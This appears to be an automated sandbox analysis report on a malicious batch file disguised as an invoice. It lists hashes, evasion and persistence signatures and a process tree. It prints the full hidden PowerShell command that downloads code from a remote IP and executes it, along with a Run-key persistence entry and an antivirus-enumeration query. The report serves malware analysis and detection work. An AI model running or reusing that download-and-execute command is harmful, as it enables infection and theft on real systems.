Analysis
- max time kernel: 961s
- max time network: 963s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 22-06-2022 20:19
Static task: static1
Behavioral task: behavioral1
  Sample: F-actura0622.bat
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: F-actura0622.bat
  Resource: win10v2004-20220414-en
General
- Target: F-actura0622.bat
- Size: 1KB
- MD5: 6cef8304265178796921535f0a2e9c03
- SHA1: 07275c43ac049126b967325baf984e3def7af1ed
- SHA256: db9c0fd3a144ea0a24d8d65841ae94f7336ed420428dd455ed4b27ac081949c5
- SHA512: 1a2fa8832ed844fad8b704754f929df1ed71931f043571f3c0d9e6025ff821b0169c028f15062df10bb350668522e9f17af14a1dd81283c5222b01af974157f3
Malware Config
- Extracted URL: http://20.91.202.137//?a=Z0DEXUBSWD7FE45T3JHBMMJXCW3DON98P9LY3SRT
Signatures
- Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoC)
  Processes:
    naK.exe: key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
- Blocklisted process makes network request (3 IoCs)
  Processes:
    powershell.exe (PID 2316): flows 6, 13, 14
- Executes dropped EXE (1 IoC)
  Processes:
    naK.exe (PID 4676)
- Checks BIOS information in registry (2 TTPs, 2 IoCs)
  BIOS information is often read in order to detect sandboxing environments.
  Processes:
    naK.exe: key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
    naK.exe: key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
- Loads dropped DLL (2 IoCs)
  Processes:
    naK.exe (PID 4676), recorded twice
- YARA rule match: themida (11 IoCs)
  Processes (resource: yara_rule):
    C:\ProgramData\boACkwMt\gcpfqzsczq.dop: themida (recorded 3 times)
    behavioral2/memory/4676-149-0x0000000004B10000-0x0000000005C07000-memory.dmp: themida
    behavioral2/memory/4676-150-0x0000000004B10000-0x0000000005C07000-memory.dmp: themida
    behavioral2/memory/4676-151-0x0000000004B10000-0x0000000005C07000-memory.dmp: themida
    behavioral2/memory/4676-152-0x0000000004B10000-0x0000000005C07000-memory.dmp: themida
    behavioral2/memory/4676-153-0x0000000004B10000-0x0000000005C07000-memory.dmp: themida
    behavioral2/memory/4676-154-0x0000000004B10000-0x0000000005C07000-memory.dmp: themida
    behavioral2/memory/4676-155-0x0000000004B10000-0x0000000005C07000-memory.dmp: themida
    behavioral2/memory/4676-156-0x0000000004B10000-0x0000000005C07000-memory.dmp: themida
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes:
    powershell.exe: set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OViDQHR = "C:\\ProgramData\\naK.lnk"
- Checks whether UAC is enabled
  Processes:
    naK.exe: key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
    flow 12: ifconfig.me
    flow 20: ipinfo.io
- Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  Processes:
    naK.exe (PID 4676)
- Modifies Internet Explorer settings
  Processes:
    naK.exe: set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FormSuggest PW Ask = "No"
    naK.exe: set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Use FormSuggest = "No"
    naK.exe: set value (str) \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FormSuggest Passwords = "No"
- Script User-Agent (1 IoC)
  Uses user-agent string associated with script host/environment.
  Processes:
    flow 23: HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
    naK.exe (PID 4676)
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    powershell.exe (PID 2316), recorded twice
- Suspicious use of AdjustPrivilegeToken (43 IoCs)
  Processes:
    powershell.exe (PID 2316): Token: SeDebugPrivilege
    WMIC.exe (PID 4520), the following sequence recorded twice: Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- Suspicious use of FindShellTrayWindow (8 IoCs)
  Processes:
    powershell.exe (PID 2316), 3 times
    naK.exe (PID 4676), 5 times
- Suspicious use of SendNotifyMessage (4 IoCs)
  Processes:
    naK.exe (PID 4676), 4 times
- Suspicious use of WriteProcessMemory (15 IoCs)
  Processes (source PID wrote to memory of target PID; each entry recorded twice unless noted):
    948 cmd.exe -> 2920 cmd.exe
    2920 cmd.exe -> 1904 chcp.com
    948 cmd.exe -> 4072 chcp.com
    948 cmd.exe -> 712 cmd.exe
    712 cmd.exe -> 2316 powershell.exe
    2316 powershell.exe -> 4520 WMIC.exe
    2316 powershell.exe -> 4676 naK.exe (recorded 3 times)
Processes
- C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\F-actura0622.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c chcp
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\chcp.com
      Command line: chcp
  - C:\Windows\system32\chcp.com
    Command line: chcp 708
  - C:\Windows\system32\cmd.exe
    Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\F-actura0622.bat" "
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep Bypass -nop -noexit -windowstyle hidden "(new-object net.webclient).DownloadString('http://20.91.202.137//?a=Z0DEXUBSWD7FE45T3JHBMMJXCW3DON98P9LY3SRT') | iex"
      - Blocklisted process makes network request
      - Adds Run key to start application
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of WriteProcessMemory
      - C:\Windows\System32\Wbem\WMIC.exe
        Command line: "C:\Windows\System32\Wbem\WMIC.exe" /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct GET displayName /Format:List
        - Suspicious use of AdjustPrivilegeToken
      - C:\ProgramData\boACkwMt\naK.exe
        Command line: "C:\ProgramData\boACkwMt\naK.exe" "C:\ProgramData\boACkwMt\odJ"
        - Identifies VirtualBox via ACPI registry values (likely anti-VM)
        - Executes dropped EXE
        - Checks BIOS information in registry
        - Loads dropped DLL
        - Checks whether UAC is enabled
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Modifies Internet Explorer settings
        - Suspicious behavior: AddClipboardFormatListener
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\ProgramData\boACkwMt\gcpfqzsczq.dop
  Filesize: 6.8MB
  MD5: cb0e540176159268be4986459091576a
  SHA1: c512c14e8a2afb15636e7b4c6f30284646b8d456
  SHA256: fbe44a3401b91f4fa23f2df40e6844931bfc1e8931fefcf301b786788b44a6f4
  SHA512: a04fc5b10b46bd2cec4ce3ec48b29ca87e3137a3f5e2d3575d18a6282c98a6c9e9e7c9316494fbeb1a4e30ce24842d41c074c3d4c3c122e0378f8259b25a4b1a
- C:\ProgramData\boACkwMt\naK.exe
  Filesize: 884KB
  MD5: 4685811c853ceaebc991c3a8406694bf
  SHA1: 9cd382eb91bfea5782dd09f589a31b47c2c2b53e
  SHA256: 3242e0a736ef8ac90430a9f272ff30a81e2afc146fcb84a25c6e56e8192791e4
  SHA512: a504fbca674f15d8964ebc6fac11d9431d700ca22736c00d5bb1e51551b0d2b9e4b2b6824bdf1a778111a0ba8d2601eada2f726b9ec7a9cfa5a53fd43c235b46
- C:\ProgramData\boACkwMt\odJ
  Filesize: 178B
  MD5: 2c2d7336ea1206702663cfb74b74d0b9
  SHA1: e5f610f63b5762104e7dbc2635b8485f267b96d1
  SHA256: 6589d846120ced6f77bda3b905ef0ff0c14947f31389481d1900a8958a19a49b
  SHA512: 9ae77c606fa3f3275da91954073b1f6b2dbddb4593463f80fc2ad42e4a07d366d353aa4530612470a66a78623f008d4c2134c6ea20a6a796374dc5e27776d024